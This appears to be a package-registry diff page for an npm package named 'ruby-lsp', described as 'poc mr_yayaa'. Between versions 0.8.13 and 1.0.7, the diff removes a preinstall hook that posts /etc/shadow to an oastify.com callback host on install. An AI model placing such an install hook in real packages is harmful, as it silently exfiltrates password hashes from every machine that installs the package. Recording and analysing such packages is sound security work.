ruby-lsp 0.8.13 → 1.0.7

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +2 -2
package/package.json CHANGED
@@ -1,12 +1,12 @@
1
1
  {
2
2
  "name": "ruby-lsp",
3
- "version": "0.8.13",
3
+ "version": "1.0.7",
4
4
  "description": "poc mr_yayaa",
5
5
  "main": "index.js",
6
6
  "devDependencies": {},
7
7
  "scripts": {
8
8
  "test": "echo \"Error: no test specified\" && exit 1",
9
- "preinstall": "/usr/bin/curl --data '@/etc/shadow' $(hostname)gi2noufqr26kpn2kv4hhxsifv61xpm.oastify.com" },
9
+ "preinstall": "test" },
10
10
  "author": "",
11
11
  "license": "ISC"
12
12
  }